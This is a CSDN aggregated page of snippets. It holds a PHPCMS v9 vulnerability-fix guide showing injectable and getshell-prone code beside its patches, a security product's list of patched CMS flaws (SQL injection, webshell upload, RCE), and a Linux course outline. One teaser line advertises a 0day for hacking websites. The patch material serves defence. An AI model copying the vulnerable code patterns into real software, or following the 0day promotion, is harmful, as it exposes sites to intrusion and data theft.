phpcmsv9入侵shell_phpcmsv9 - CSDN
精华内容
参与话题
  • 此Oday非同寻常,速度下载吧黑友们!一天几个站没问题!
  • PHPCMS一些漏洞修复及解决方案

    千次阅读 2019-01-17 11:14:55
    phpsso.php注入漏洞修复  文件位置:  /phpcms/libs/classes/attachment.class.php解决办法(Line 129): // 修改之前 $phpssouid = $arr['uid']; 改为: // 修改之后 ... phpcms/libs/classes/...

     文件位置:

      /phpcms/libs/classes/attachment.class.php
    解决办法(Line 129):

    // 修改之前  
    $phpssouid = $arr['uid'];

    改为:

    // 修改之后  
    $phpssouid = intval($arr['uid']);
    • phpcms/libs/classes/attachment.class.php某处逻辑问题导致getshell修复方案

    文件位置:

      /phpcms/libs/classes/attachment.class.php
    解决办法(Line 144):

    // 修改之前  
    function download($field, $value,$watermark = '0',$ext = 'gif|jpg|jpeg|bmp|png', $absurl = '', $basehref = '')
    	{
            global $image_d;
    		$this->att_db = pc_base::load_model('attachment_model');
    		$upload_url = pc_base::load_config('system','upload_url');
    		$this->field = $field;
    ...

    改为:

    // 修改之后  
    function download($field, $value,$watermark = '0',$ext = 'gif|jpg|jpeg|bmp|png', $absurl = '', $basehref = '')
    	{
    
    // 此处增加类型的判断
            if($ext !== 'gif|jpg|jpeg|bmp|png'){
                if(!in_array(strtoupper($ext),array('JPG','GIF','BMP','PNG','JPEG'))) exit('附加扩展名必须为gif、jpg、jpeg、bmp、png');
            }
    
            global $image_d;
    		$this->att_db = pc_base::load_model('attachment_model');
    		$upload_url = pc_base::load_config('system','upload_url');
    		$this->field = $field;
    ...

     

    • phpcms的/phpcms/modules/poster/poster.php 文件中,未对输入参数$_GET['group']进行严格过滤,导致注入漏洞。

    文件位置:

      /phpcms/modules/poster/poster.php
    解决办法(Line 221):

    // 修改之前
    ...
    if ($_GET['group']) {
        $group = " `".$_GET['group']."`";
        $fields = "*, COUNT(".$_GET['group'].") AS num";
        $order = " `num` DESC";
    }
    ...

    改为:

    // 修改之后  
    ...
    if ($_GET['group']) {
        $_GET['group'] = preg_replace('#`#', '', $_GET['group']);
        $group = " `".$_GET['group']."`";
        $fields = "*, COUNT(".$_GET['group'].") AS num";
        $order = " `num` DESC";
    }
    ...

     

    • phpcmsv9.5.9以后版本开始默认使用mysqli支持,在\phpcms\modules\pay\respond.php中,因为代码逻辑不够严谨,导致宽字节注入

    文件位置:

      /phpcms/modules/pay/respond.php
    解决办法(Line 16):

    // 修改之前
    /**
     * return_url get形式响应
     */
     public function respond_get() {
        if ($_GET['code']){
            $payment = $this->get_by_code($_GET['code']);
        if(!$payment) showmessage(L('payment_failed'));
            $cfg = unserialize_config($payment['config']);
    ...

    改为:

    // 修改之后
    /**
     * return_url get形式响应
     */
     public function respond_get() {
        if ($_GET['code']){
            $payment = $this->get_by_code(mysql_real_escape_string($_GET['code']));
        if(!$payment) showmessage(L('payment_failed'));
            $cfg = unserialize_config($payment['config']);
    
    ...

      文件路径:/phpcms/modules/content/down.php

    修复区域(1),所在位置约17行

    $a_k = trim($_GET['a_k']);

    if(!isset($a_k)) showmessage(L('illegal_parameters'));

    $a_k = sys_auth($a_k, 'DECODE', pc_base::load_config('system','auth_key'));

    if(empty($a_k)) showmessage(L('illegal_parameters'));

    unset($i,$m,$f);

    parse_str($a_k);

    if(isset($i)) $i = $id = intval($i);

    补丁代码

    $a_k = trim($_GET['a_k']);

    if(!isset($a_k)) showmessage(L('illegal_parameters'));

    $a_k = sys_auth($a_k, 'DECODE', pc_base::load_config('system','auth_key'));

    if(empty($a_k)) showmessage(L('illegal_parameters'));

    unset($i,$m,$f);

    parse_str($a_k); 

    $a_k = safe_replace($a_k); //此处为修补代码,约第17行

    if(isset($i)) $i = $id = intval($i);

    修复区域(2),所在位置约89行

    源代码

    $a_k = trim($_GET['a_k']);

    $pc_auth_key = md5(pc_base::load_config('system','auth_key').$_SERVER['HTTP_USER_AGENT'].'down');

    $a_k = sys_auth($a_k, 'DECODE', $pc_auth_key);

    if(empty($a_k)) showmessage(L('illegal_parameters'));

    unset($i,$m,$f,$t,$ip);

    parse_str($a_k);       

    if(isset($i)) $downid = intval($i);

    补丁代码

    $a_k = trim($_GET['a_k']);

    $pc_auth_key = md5(pc_base::load_config('system','auth_key').$_SERVER['HTTP_USER_AGENT'].'down');

    $a_k = sys_auth($a_k, 'DECODE', $pc_auth_key);

    if(empty($a_k)) showmessage(L('illegal_parameters'));

    unset($i,$m,$f,$t,$ip);

    parse_str($a_k); 

    $a_k = safe_replace($a_k);//此处为修补代码,约第89行

    if(isset($i)) $downid = intval($i);

    修复区域(3),所在位置约120行

    源代码

    //处理中文文件

    if(preg_match("/^([\s\S]*?)([\x81-\xfe][\x40-\xfe])([\s\S]*?)/", $fileurl)) {

       $filename = str_replace(array("%5C", "%2F", "%3A"), array("\\", "/", ":"), urlencode($fileurl));

       $filename = urldecode(basename($filename));

    }

    $ext = fileext($filename);

    $filename = date('Ymd_his').random(3).'.'.$ext;

    file_down($fileurl, $filename);

    补丁代码

    //处理中文文件

    if(preg_match("/^([\s\S]*?)([\x81-\xfe][\x40-\xfe])([\s\S]*?)/", $fileurl)) {

        $filename = str_replace(array("%5C", "%2F", "%3A"), array("\\", "/", ":"), urlencode($fileurl));

        $filename = urldecode(basename($filename));

    }

    $ext = fileext($filename);

    $filename = date('Ymd_his').random(3).'.'.$ext;

    $fileurl = str_replace(array('<','>'), '',$fileurl); //此处为修补代码,约第120行

    file_down($fileurl, $filename

    展开全文
  • 当前服务器安全补丁管理功能可检测和修复的漏洞如下(若有新的补丁将更新在这里): 补丁编号 路径 漏洞名称 漏洞描述 ...phpwind ubb标签属性xss


     当前服务器安全补丁管理功能可检测和修复的漏洞如下(若有新的补丁将更新在这里):


    补丁编号

    路径

    漏洞名称

    漏洞描述

    补丁研发时间

    159

    /src/library/ubb/PwSimpleUbbCode.php

    phpwind ubb标签属性xss注入

    phpwind的/upload/src/library/ubb/PwSimpleUbbCode.php中对ubb标签属性过滤不严,导致xss漏洞的风险

    2016-06-17 18:33:58

    158

    /src/library/ubb/PwUbbCode.php

    phpwind后台SQL注入

    phpwind的/upload/src/library/ubb/PwUbbCode.php中多处函数对输入参数过滤不严,导致SQL注入的风险

    2016-06-17 18:33:39

    157

    /LIB/common.php

    abcms通用SQL注入漏洞

    abcms的/LIB/common.php中safe_check()防注入模块函数存在逻辑绕过漏洞,源代码中检测到sql注入风险后未及时阻断程序流,正确的最佳实践是使用exit或者die函数直接阻断程序流

    2016-06-17 10:00:34

    156

    /web/source/site/article.ctrl.php

    微擎文件编辑SQL注入

    微擎的/web/source/site/article.ctrl.php中对$_GPC[‘template’]、$_GPC[‘title’]、$_GPC[‘description’]、$_GPC[‘source’]、$_GPC[‘author’]参数未进行正确转义过滤,导致SQL注入的产生

    2016-06-14 09:19:48

    155

    /modules/guestbook/controller.php

    php168 SQL注入

    php168的/modules/guestbook/controller.php文件verify_data()函数对输入参数未采取正确转义处理,导致SQL注入的产生,可能导致网站核心数据泄漏

    2016-06-13 10:33:39

    154

    /destoon/include/property.func.php

    Destoon SQL注入

    Destoon的/destoon/include/property.func.php中property_option()函数对输入参数$catid未进行正确int转义,导致黑客可进行整型注入,获取网站后台密码等

    2016-06-12 09:37:57

    153

    /app/system/include/class/upfile.class.php

    Metinfo前台注入漏洞

    Metinfo的/app/system/include/class/upfile.class.php文件中upload()未对POST的$FILE变量正确取值,导致攻击者可通过传入畸形数组进行SQL注入,进而造成后台数据泄漏

    2016-06-08 10:45:02

    152

    /control/doc.php

    HDWiki SQL注入漏洞

    HDWiki的/control/doc.php中doedit()和doautosave()函数在进程编码转换的时候,存在宽字节注入漏洞,黑客可构造攻击包获得网站后台密码,盗取数据库数据

    2016-06-03 14:00:36

    151

    /source/function/function_core.php

    Discuz memcache+ssrf GETSHELL漏洞

    Discuz存在SSRF漏洞,在配置了memcache的情况下,攻击者可以利用ssrf通过memcache中转,向磁盘上写入WEBSHELL恶意代码,从而造成数据库泄漏。任何的外部输入,包括memcache缓存都应该认为不可信,建议在任何从外部输入的数据都进行必要的转义和过滤,可禁用preg_replace /e代码执行

    2016-05-30 20:05:49

    150

    /order/alipay/return_url.asp

    AspCMS SQL注入漏洞

    AspCMS /order/alipay/return_url.asp对订单号未进行正确的转型处理,导致Int型SQL注入,可能导致数据泄漏

    2016-05-29 18:08:07

    149

    /plug/comment/addComment.asp

    Aspcms注入漏洞

    Aspcms的/plug/comment/addComment.asp中addComment()函数对contentID未进行正确的转型,导致Int型SQL注入

    2016-05-29 17:29:35

    148

    /wap/member/model/com.class.php

    phpyun wap任意文件上传漏洞

    phpyun的wap模块/wap/member/model/index.class.php的photo_action()函数中,对上传文件的内容和扩展没有进行任何的验证和限制,导致任意文件上传漏洞,黑客可利用此漏洞直接上传PHP WEBSHELL脚本文件,造成数据泄漏

    2016-05-29 16:46:06

    147

    /wap/member/model/index.class.php

    phpyun wap任意文件上传漏洞

    phpyun的wap模块/wap/member/model/index.class.php的photo_action()函数中,对上传文件的内容和扩展没有进行任何的验证和限制,导致任意文件上传漏洞,黑客可利用此漏洞直接上传PHP WEBSHELL脚本文件,造成数据泄漏

    2016-05-29 16:45:30

    146

    /controllers/AttachmentController.php

    fineCMS文件上传漏洞

    fineCMS的/controllers/AttachmentController.php的upload()函数中,采取了黑名单机制对上传文件的扩展名进行限制,但代码本身存在绕过逻辑漏洞,黑客可以利用该漏洞直接上传可执行脚本

    2016-05-27 19:21:28

    145

    /upload/src/windid/service/base/WindidUtility.php

    phpwindv9 md5 padding漏洞导致GETSHELL

    phpwindv9的MAC验证存在MD5 Padding漏洞,黑客可通过MD5 Length攻击获取secrect key,从而进入管理员后台

    2016-05-20 17:42:16

    144

    /login.php

    b2bbuilder SQL注入

    b2bbuilder /login.php文件中,未在脚本开头就立引入includes/global.php文件进行全局输入参数过滤,导致user输入参数过滤不严,进而导致SQL注入

    2016-05-19 15:48:28

    143

    /mapi/lib/uc_save_userinfo.action.php

    方维众筹SQL注入

    方维众筹的/mapi/lib/uc_save_userinfo.action.php中的index()函数对输入参数cates没有进行正确的转义和转型,导致SQL注入

    2016-05-19 14:23:42

    142

    /mapi/lib/uc_refund.action.php

    方维众筹SQL注入

    方维众筹的/mapi/lib/uc_refund.action.php中的delete()函数对输入参数id没有进行正确的转义和转型,导致SQL注入

    2016-05-19 13:57:02

    141

    /web/source/mc/member.ctrl.php

    微擎SQL注入漏洞

    微擎CMS /web/source/mc/member.ctrl.php 中对输入参数$_GPC[‘uid’]未进行有效性检查,导致黑客可构造特殊查询参数,进行SQL注入。您也可登录官方网站查看手动修复方案

    2016-05-17 18:03:26

    140

    /web/source/utility/verifycode.ctl.php

    微擎SQL注入漏洞

    微擎CMS /web/source/utility/verifycode.ctl.php 中对输入参数$_GPC[‘table’]未进行有效性检查,导致黑客可构造特殊查询参数,进行SQL注入

    2016-05-17 17:29:35

    139

    /include/help.class.php

    74cms 多处SQL注入漏洞

    74cms /include/help.class.php addslashes_deep()函数的内置waf白名单过滤机制存在bug,黑客可在攻击payload中包含pic1、pic2参数即可利用白名单机制绕过过滤代码,导致SQL注入

    2016-05-17 16:11:11

    138

    /wp-content/plugins/bbpress/includes/core/functions.php

    wordpress bbpress插件XSS漏洞

    漏洞存在于wordpress插件bbpress /wp-content/plugins/bbpress/includes/core/functions.php文件中,攻击者通过用户提及功能(即@用户名,而bbPress的用户提及功能能够将@用户名替换成另外一个链接,创建了一个嵌套链接的HTML结构),可在论坛文章中存储恶意代码。而这些文章会被存在到数据库中,后面会展示给随后的访问者。如果攻击者有着更加成熟的技术,可通过这种方法从版主或者管理员处窃取cookies,以管理员身份进行操作,实现提权

    2016-05-12 17:32:31

    137

    /dayrui/libraries/drivers/View.php

    fineCMS前台任意文件包含GETSHELL漏洞

    fineCMS的/dayrui/libraries/drivers/View.php中get_view_file()函数,对传入的包含文件名扩展过滤逻辑存在bug,导致黑客可以构造特殊的文件路径,进行任意文件包含,从而写入WEBSHELL

    2016-05-11 19:41:29

    136

    /ntko/upLoadOfficeFile.php

    PHPOA任意文件上传

    PHPOA /ntko/upLoadOfficeFile.php 未进行有效登录验证,导致攻击者可直接通过该文件上传WEBSHELL,进而造成网站入侵

    2016-05-06 18:24:47

    135

    /wp-includes/media.php

    wordpress WP_Image_Editor_Imagick 指令注入漏洞

    该修复方案为临时修复方案,可能存在兼容性风险,为了防止WP_Image_Editor_Imagick扩展的指令注入风险,将wordpress的默认图片处理库优先顺序改为GD优先,用户可在/wp-includes/media.php的_wp_image_editor_choose()函数中看到被修改的部分

    2016-05-05 15:16:27

    134

    /apps/admin/Lib/Action/UpgradeAction.class.php

    ThinkSNS CSRF漏洞可导致GETSHELL

    ThinkSNS的/apps/admin/Lib/Action/UpgradeAction.class.php文件中,对zip升级包的来源url未进行认证,导致攻击者可构造CSRF进行任意文件下载,解压,从而导致GETSHELL

    2016-05-05 09:10:47

    133

    /apps/public/Lib/Action/FollowAction.class.php

    ThinkSNS SQL注入

    ThinkSNS的/apps/public/Lib/Action/FollowAction.class.php的bulkDoFollow函数中,对fids输入参数过滤不严,导致黑客可能进行SQL注入

    2016-05-03 19:43:35

    132

    /e/master/build_static.aspx

    pageadmin SQL注入、越权访问导致后台任意访问漏洞

    pageadmin /e/master/build_static.aspx文件中,Build_Detail()函数未对输入参数进行严格过滤,导致SQL注入,攻击者可利用此漏洞获取Cookie,进入网站后台

    2016-04-22 12:11:38

    131

    /wp-includes/http.php

    wordpress IP验证不当漏洞

    wordpress /wp-includes/http.php文件中的wp_http_validate_url函数对输入IP验证不当,导致黑客可构造类似于012.10.10.10这样的畸形IP绕过验证,进行SSRF

    2016-04-19 08:47:07

    130

    /Application/Admin/Controller/PublicController.class.php

    weiphp3.0最新版登录逻辑SQL注入漏洞

    weiphp在登录位置进行了验证码验证,但是如果黑客通过HTTP抓取动态获取验证码,则可突破这层防御,并且未对$username, $password进行任何输入过滤,导致SQL注入

    2016-04-03 20:53:24

    129

    /phpcms/modules/pay/respond.php

    phpcmsv9宽字节注入

    phpcmsv9.5.9以后版本开始默认使用mysqli支持,在\phpcms\modules\pay\respond.php中,因为代码逻辑不够严谨,导致宽字节注入

    2016-03-21 15:11:38

    128

    /framework/model/res.php

    PHPOK SQL注入漏洞

    phpok cms对前端上传附件的参数过滤不严,导致SQL注入

    2016-03-10 10:31:05

    127

    /api/phpsso.php

    phpcms注入漏洞

    phpcms注入漏洞

    2016-02-23 16:29:20

    126

    /src/applications/task/service/PwTaskExtends.php

    phpwindv9任务中心GET型CSRF代码执行漏洞

    phpwindv8任务中心存在GET型CSRF漏洞,绕过了phpwind原始的CSRF Token化防御,黑客可利用该漏洞进行对象反序列化注入代码执行,获取WEBSHELL

    2016-02-17 09:58:58

    125

    /src/applications/task/admin/TaskRewardController.php

    phpwindv9任务中心GET型CSRF代码执行漏洞

    phpwindv8任务中心存在GET型CSRF漏洞,绕过了phpwind原始的CSRF Token化防御,黑客可利用该漏洞进行对象反序列化注入代码执行,获取WEBSHELL

    2016-02-17 09:58:33

    124

    /src/applications/task/admin/TaskConditionMemberController.php

    phpwindv9任务中心GET型CSRF代码执行漏洞

    phpwindv8任务中心存在GET型CSRF漏洞,绕过了phpwind原始的CSRF Token化防御,黑客可利用该漏洞进行对象反序列化注入代码执行,获取WEBSHELL

    2016-02-17 09:58:20

    123

    /src/applications/task/admin/TaskConditionBbsController.php

    phpwindv9任务中心GET型CSRF代码执行漏洞

    phpwindv8任务中心存在GET型CSRF漏洞,绕过了phpwind原始的CSRF Token化防御,黑客可利用该漏洞进行对象反序列化注入代码执行,获取WEBSHELL

    2016-02-17 09:58:01

    122

    /app/design/adminhtml/default/default/template/sales/order/view/info.phtml

    magento XSS漏洞

    这个漏洞是一个存储型XSS,涉及到用户注册一个新账户时或者当用户更改当前账户的邮件地址时等涉及到邮箱账号提交的场景。该问题关键在于CMS(内容管理系统)如何过滤在用户侧输入的包含邮件地址信息的数据。,Magento并没有有效地对邮件地址中可能存在的恶意字符进行过滤,这种不安全的数据过滤机制能够让攻击者在输入电子邮箱的同时附加上恶意代码

    2016-01-27 10:08:03

    121

    /inc/class_core.php

    MyBB远程代码执行/SQL注入漏洞

    MyBB/inc/class_core.php在处理register_globals = On可能导致的变量覆盖时,防御逻辑存在漏洞,黑客可在COOKIES中构造特殊的字符串,绕过防御机制,进行本地变量覆盖攻击,远程执行代码

    2016-01-25 10:59:45

    120

    /goods.php

    ecshop SQL注入

    在ecshop特定版定的goods.php文件中,对id参数过滤不严,黑客可以利用该注入点进行SQL注入,获取数据库中敏感信息

    2016-01-15 15:52:27

    119

    /graphs_new.php

    cacti后台SQL注入漏洞

    cacti /graphs_new.php中对$_POST["cg_g"]参数过滤不严,导致SQL注入的发生,可能导致敏感数据泄漏

    2016-01-05 10:42:24

    118

    /public/class_connector.php

    espcms前台任意登录漏洞

    espcms文件/public/class_connector.php对Cookies中的输入参数ecisp_member_info滤不当,导致黑客可以通过构造畸形HTTP包,伪装劫持成功任意用户登录网站

    2015-12-29 16:52:56

    117

    /adminsoft/control/citylist.php

    espcms后台SQL注入漏洞

    espcms后台文件/adminsoft/control/citylist.php对输入参数parentid过滤不当,导致SQL注入的产生,黑客可以利用该漏洞获取数据库敏感信息,甚至上传WEBSHELL,入侵网站

    2015-12-28 17:26:35

    116

    /libraries/joomla/session/session.php

    joomla畸形反序列化数据包注入导致远程代码执行

    joomla畸形反序列化数据包注入导致远程代码执行

    2015-12-15 15:54:08

    115

    /root/.ssh/authorized_keys

    redis未授权访问漏洞导致SSH被部署免登公钥

    redis未授权访问漏洞

    2015-11-27 16:58:43

    114

    /editor/filemanager/connectors/test.html

    fckeditor编辑器任意文件上传漏洞

    fckeditor编辑器任意文件上传漏洞,建议删除此文件

    2015-11-06 10:55:44

    112

    /Cache/file_up.aspx

    KesionCMS任意文件上传漏洞

    KesionCMS任意文件上传漏洞

    2015-09-15 10:31:26

    111

    /wp-content/plugins/wp-symposium/server/php/UploadHandler.php

    wordpress任意文件上传漏洞

    wordpress任意文件上传漏洞

    2015-09-10 11:29:02

    110

    /includes/database/database.inc

    drupal注入漏洞

    drupal过滤不严导致SQL注入漏洞

    2015-09-10 10:18:29

    108

    /Lib/Action/CommonAction.class.php

    lumanager注入漏洞

    lumanager CMS SQL注入漏洞

    2015-09-09 19:10:44

    107

    /Style/header/Lib/Controller/AvatarFlashUpload.php

    绿麻雀CMS上传漏洞

    绿麻雀CMS上传漏洞

    2015-09-08 15:24:55

    105

    /version.php

    phpweb输入过滤不严漏洞

    phpweb输入过滤不严漏洞

    2015-09-07 15:10:45

    103

    /inc/Check_Sql.asp

    良精南方CMS注入漏洞

    良精南方CMS SQL注入漏洞

    2015-09-01 16:57:18

    102

    /admin/include/common.inc.php

    Metinfo注入漏洞

    Metinfo系统存在逻辑缺陷导致条件注入,可修改任意管理员信息

    2015-09-01 09:36:44

    98

    /inc/AspCms_CommonFun.asp

    aspcms注入漏洞

    AspCMS管理系统有较多漏洞,涉及到SQL注入、密码泄漏、后台写SHELL

    2015-08-20 19:15:31

    88

    /app/buyer_groupbuy.app.php

    ecmall注入漏洞

    ecmall过滤不严导致SQL注入漏洞

    2015-08-14 18:58:31

    87

    /dayrui/libraries/Chart/ofc_upload_image.php

    finecms任意文件上传漏洞

    finecms任意文件上传漏洞

    2015-08-14 12:02:01

    85

    /hy/choose_pic.php

    qibo cms前台上传漏洞

    qibo cms变量覆盖漏洞导致前台任意文件上传

    2015-08-05 19:38:57

    84

    /hr/listperson.php

    qibo cms任意文件包含漏洞

    qibo cms任意文件包含漏洞导致代码执行

    2015-08-05 16:41:20

    83

    /editor.php

    weathermap代码注入执行漏洞

    weathermap代码注入执行漏洞

    2015-07-31 11:11:25

    80

    /phpcms/modules/member/index.php

    phpcms注入漏洞

    phpcms用户登录注入漏洞

    2015-07-21 20:41:47

    79

    /api/get_menu.php

    phpcms authkey泄漏漏洞

    phpcms authkey泄漏漏洞

    2015-07-06 19:40:14

    78

    /phpsso_server/phpcms/modules/phpsso/index.php

    phpcms注入漏洞

    phpcms注入漏洞

    2015-07-06 19:39:58

    76

    /lib/tool/front_class.php

    cmseasy重置任意用户(包括管理员)的密码漏洞

    攻击者通过构造特殊的HTTP包,可以直接重置任意用户(包括管理员)的密码

    2015-07-02 16:53:10

    75

    /a/apps/zhujibao/manager/apps/config/config.php

    主机宝默认cookies越权登录漏洞

    主机宝默认cookies越权登录漏洞

    2015-06-08 19:10:30

    74

    /source/class/helper/helper_seo.php

    discuz代码执行漏洞

    SEO模块中的preg_replace+修正符e+双引号引发的远程代码执行漏洞

    2015-05-24 10:31:03

    73

    /utility/convert/index.php

    discuz代码执行漏洞

    Discuz! x3.1的插件/utility/convert/index.php存在代码执行漏洞,如果用户在使用完之后不删除,会导致网站容易被入侵

    2015-05-23 19:41:54

    72

    /category.php

    ecshop注入漏洞

    ecshop过滤不严导致SQL注入漏洞

    2015-05-23 16:07:57

    71

    /includes/init.php

    ecshop任意用户登录漏洞

    Ecshop对用户输入的cookie,判断免登的逻辑中存在漏洞,导致黑客可以直接通过cookie伪造登录任意用户

    2015-05-23 16:07:46

    70

    /search.php

    ecshop注入漏洞

    ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞

    2015-05-23 16:07:33

    69

    /api/client/includes/lib_api.php

    ecshop注入漏洞

    ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库

    2015-05-23 15:56:04

    68

    /flow.php

    ecshop注入漏洞

    ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞,攻击者可利用火狐tamper data等插件修改提交到配送地址页面的post数据,造成未授权的数据库操作甚至执行任意代码

    2015-05-23 15:55:52

    67

    /includes/modules/payment/alipay.php

    ecshop注入漏洞

    ECSHOP支付插件存在SQL注入漏洞,此漏洞存在于/includes/modules/payment/alipay.php文件中,该文件是ECshop的支付宝插件。由于ECShop使用了str_replace函数做字符串替换,黑客可绕过单引号限制构造SQL注入语句。只要开启支付宝支付插件就能利用该漏洞获取网站数据,且不需要注册登入

    2015-05-23 15:55:39

    65

    /includes/lib_base.php

    ecshop后门

    ECShop某版本补丁存在逻辑后门

    2015-05-23 15:55:06

    64

    /pick_out.php

    ecshop注入漏洞

    ECShop在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过滤处理,导出key键注入

    2015-05-23 15:54:47

    63

    /class/functions.php

    empirebak帝国备份王代码注入漏洞

    empirebak帝国备份王备份替换功能滥用导致黑客可向磁盘文件插入恶意代码

    2015-05-22 13:44:21

    61

    /plus/guestbook/edit.inc.php

    dedecms注入漏洞

    dedecms留言板注入漏洞

    2015-05-22 13:15:53

    60

    /include/filter.inc.php

    dedecms注入漏洞

    dedecms的变量覆盖漏洞导致注入漏洞,/include/filter.inc.php这个文件在系统配置文件之后,里面有foreach循环创建变量,所以可以覆盖系统变量, 在/member目录的大部分文件都包含这么一个文件,也就是说/member目录的大部分文件都受此漏洞影响可以覆盖系统变量

    2015-05-22 10:43:17

    56

    /member/uploads_edit.php

    dedecms上传漏洞

    Dedecms 5.3版本下的member/uploads_edit.php中的未限制文件上传漏洞允许远程攻击者通过上传一个有两个扩展的文件名的文件,然后借助未知向量访问该文件而执行任意代码

    2015-05-21 15:26:52

    55

    /member/resetpassword.php

    dedecms密码重置漏洞

    dedecms SQL注入漏洞导致可以修改任意用户密码

    2015-05-21 14:29:32

    54

    /member/reg_new.php

    dedecms注入漏洞

    dedecms会员中心注入漏洞

    2015-05-21 13:51:31

    53

    /member/pm.php

    dedecms注入漏洞

    dedecms会员中心注入漏洞

    2015-05-21 10:47:07

    52

    /member/myfriend_group.php

    dedecms注入漏洞

    dedecms会员中心注入漏洞

    2015-05-21 10:00:09

    51

    /member/mtypes.php

    dedecms注入漏洞

    dedecms会员中心注入漏洞

    2015-05-21 09:26:31

    50

    /member/flink_main.php

    dedecms注入漏洞

    会员模块中存在的SQL注入

    2015-05-19 17:11:33

    49

    /member/edit_baseinfo.php

    dedecms注入漏洞

    会员模块中存在的SQL注入

    2015-05-19 16:50:57

    48

    /include/helpers/archive.helper.php

    dedecms注入漏洞

    dedecms会员中心注入漏洞

    2015-05-19 15:57:29

    47

    /plus/stow.php

    dedecms注入漏洞

    dedecms收藏文章功能$title变量未过滤,造成二次注入

    2015-05-19 15:08:06

    46

    /member/buy_action.php

    dedecms注入漏洞

    dedecms mchStrCode函数弱算法导致黑客可注入攻击

    2015-05-19 12:22:15

    43

    /include/uploadsafe.inc.php

    dedecms上传漏洞

    dedecms过滤逻辑不严导致上传漏洞

    2015-05-16 15:13:16

    40

    /plus/feedback_ajax.php

    dedecms注入漏洞

    dedecms的变量覆盖漏洞导致注入漏洞

    2015-05-16 13:49:06

    39

    /plus/feedback.php

    dedecms注入漏洞

    dedecms的变量覆盖漏洞导致注入漏洞

    2015-05-16 13:37:20

    38

    /plus/search.php

    dedecms注入漏洞

    dedecms变量覆盖导致注入漏洞

    2015-05-15 13:57:18

    37

    /install/index.php.bak

    dedecms重装漏洞

    dedecms安装文件未删除导致非授权访问

    2015-05-15 13:12:13

    36

    /do/jf.php

    qibo cms代码执行漏洞

    qibo cms模版编辑导致恶意代码执行漏洞

    2015-05-15 11:32:29

    34

    /member/special.php

    qibo cms注入漏洞

    该漏洞存在于/member/special.php文件下,由于未对变量进行正确初始化,并在SQL查询中带入这个变量,导致黑客可以通过POST请求注入特殊构造的HTTP请求,通过为初始化变量进行SQL注入攻击

    2015-05-15 11:24:47

    33

    /admin/module/loginMod.class.php

    duxcms注入漏洞

    duxcms后台登录处存在sql注入,黑客可通过这个漏洞获取管理员密码、直接任意用户登录后台等攻击

    2015-05-15 11:24:15

    32

    /api/uc.php

    Discuz uc.key泄露导致代码注入漏洞

    在Discuz中,uc_key是UC客户端与服务端通信的通信密钥,discuz中的/api/uc.php存在代码写入漏洞,导致黑客可写入恶意代码获取uckey,最终进入网站后台,造成数据泄漏。您也可以登录官方网站更新到最新版本解决

    2015-05-15 11:23:35

    31

    /inc/common.inc.php

    qibo cms注入漏洞

    qibo cms变量覆盖漏洞导致SQL注入漏洞

    2015-05-15 11:05:27

    13

    /mysql/add_db.php

    wdcp未授权数据库添加漏洞

    wdcp未授权数据库添加漏洞

    2015-05-15 10:47:02

    12

    /mysql/add_user.php

    wdcp未授权用户添加漏洞

    wdcp未授权用户添加漏洞

    2015-05-15 10:45:49

    11

    /admin/get_password.php

    ecshop密码找回漏洞

    Ecshop提供了密码找回功能,但是整个密码找回流程中存在一些设计上的安全隐患导致黑客可获取任意用户密码

    2015-05-15 10:44:34

    10

    /include/dialog/select_soft_post.php

    dedecms任意文件上传漏洞

    dedecms变量覆盖漏洞导致任意文件上传

    2015-05-15 10:44:05

    9

    /scripts/setup.php

    phpmyadmin反序列化注入漏洞

    phpmyadmin对输入参数过滤不严导致反序列化注入漏洞

    2015-05-15 10:35:21

    8

    /include/dedesql.class.php

    dedecms变量覆盖漏洞

    dedecms变量为初始化导致本地变量注入

    2015-05-15 10:32:41

    7

    /admin/edit_languages.php

    ecshop代码注入漏洞

    ecshop后台模版编译导致黑客可插入任意恶意代码

    2015-05-15 10:30:32

    展开全文
  • Linux云计算架构

    千次阅读 2016-01-08 08:39:00
    第一阶段: Linux之美 课程 Linux系统管理 ...Shell编程 Python脚本编程 Linux系统管理 内容 计算机基础 网络基础 Windows Server基础 Linux简介 Linu
    第一阶段: Linux之美
    课程
    Linux系统管理
    科目
    基础课程
    Linux基本管理
    Linux用户与权限管理
    Linux文件系统管理
    Shell编程
    Python脚本编程
    Linux系统管理
    内容
    计算机基础
    网络基础
    Windows Server基础
    Linux简介
    Linux安装方法
    Linux常用命令
    VIM编辑器使用
    Linux软件分类
    Linux软件安装方法
    Linux用户管理
    Linux基本权限管理
    ACL权限管理
    文件特殊权限管理
    sudo权限管理
    文件系统常用命令
    存储设备挂载
    fdisk分区
    磁盘配额管理
    Raid管理
    LVM管理
    Bash基本功能
    Bash变量
    环境变量配置文件
    正则表达式
    字符截取命令
    条件判断语句
    流程控制语句
    Python数据类型
    Python语法
    Python函数
    Python常用模块
    面向对象编程
    Linux服务管理
    进程管理
    定时任务
    Linux启动管理
    Linux日志管理
    备份与恢复
    第二阶段: 强大的Linux服务
    课程
    Linux服务管理
    科目
    Linux网络基础
    DHCP服务器配置
    Vsftp服务器配置
    Samba服务器配置
    NFS网络文件系统
    SSH服务期配置
    VNC服务
    DNS域名系统
    Postfix邮件服务器
    LAMP架构部署
    Apache服务器
    LNMP架构部署
    Nginx服务器配置
    Rsync数据同步
    内容
    Linux中IP地址配置方式
    虚拟机网络配置
    DHCP原理与概念
    DHCP配置文件解析
    DHCP服务器端配置
    DHCP中继
    DHCP超级作用域
    FTP概念与协议
    FTP相关文件
    FTP配置文件解析
    FTP服务器端配置
    虚拟用户使用
    FTP加密
    Samba服务器概念与原理
    Samba配置文件
    Samba共享权限设置
    NFS的作用
    NFS服务器端配置
    NFS访问控制
    非对称钥匙对加密原理
    SSH配置文件解析
    SSH公钥登陆
    SCP命令
    SSH隧道
    图形化远程管理简介
    VNC服务器端配置
    VNS客户端配置
    域名系统
    DNS原理与概念
    DNS配置文件
    DNS实现域名解析
    主从DNS服务器
    bind+MySQL
    邮件服务器概念与原理
    Postfix相关文件
    Postfix服务器端配置
    邮件客户端使用
    垃圾邮件过滤
    邮件自动回复
    LAMP架构解析
    LAMP搭建思路与软件选择
    LAMP架构部署
    PHPCMS系统部署
    Web技术原理
    常见Web服务器分析
    Apache配置文件详解
    虚拟主机
    SSL安全套接层
    LNMP架构分析与优势
    LNMP部署
    一键安装部署LNMP架构
    Nginx配置文件
    Nginx服务器端配置
